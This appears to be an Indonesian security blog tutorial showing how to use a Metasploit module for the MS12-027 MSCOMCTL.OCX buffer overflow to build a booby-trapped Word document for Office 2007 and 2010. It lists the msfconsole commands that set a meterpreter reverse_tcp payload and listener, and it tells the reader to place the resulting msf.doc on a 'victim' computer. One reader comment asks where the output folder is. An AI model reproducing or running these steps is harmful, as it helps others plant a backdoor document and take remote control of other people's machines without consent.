Info BackTrack

Linux & Security Tutorial

Exploit Windows Menggunakan Backdoor Ms Word Doc via MSF


Modul eksploitasi buffer overflow stack dalam MSCOMCTL.OCX. Ini menggunakan RTF berbahaya untuk menanamkan Control MSComctlLib.ListViewCtrl.2 dan khusus dibuat sebagai dieksploitasi.

Modul exploit ini menargetkan MsOffice 2007 dan MsOffice 2010 sebagai target. Untuk lebih jelasnya kita lihat yuk screen shot uji cobanya. =))

Exploit Targets
MS office 2007 on windows XP SP 2, 3
MS office 2010 on windows 7/SP1

— Start msfconsole

ketik : use exploit/windows/fileformat/ms12_027_mscomctl_bof
msf exploit (ms12_027_mscomctl_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (ms12_027_mscomctl_bof)>set lhost 192.168.1.3 (IP of Local Host)
msf exploit (ms12_027_mscomctl_bof)>exploit

— Dari Screen shot diatas, backdoor telah dibuat dan terdapat pada directory /root/.msf4/local/msf.doc .Sekedar mengingatkan, apa bila nama foler didalam linux terdapat (.) titik, silahkan tekan di keyboard alt + . (titik).

Kalau sudah menemukan file msf.doc , silahkan copy dan paste file tersebut pada komputer korban.

—Aktifkan exploit handler dan eksekusi file backdor msf.doc yang sudah kita buat.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.3
exploit

— done

Terimakasih telah membaca artikel saya yang sederhana ini. Jika ada pertanyaan silahkan komen atau bisa PM saya. =))

greatz : Mama , Papa , dan Mendiang Tunangan Ku  (I don’t care other women).

create by Lindo.

Artikel Terkait:

One response to “Exploit Windows Menggunakan Backdoor Ms Word Doc via MSF

  1. ede February 17, 2013 at 5:17 am

    saya tidak bisa menemukan file msf4 di backtrack 5 r3

    kalau boleh tau itu letaknya di mana ae…

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: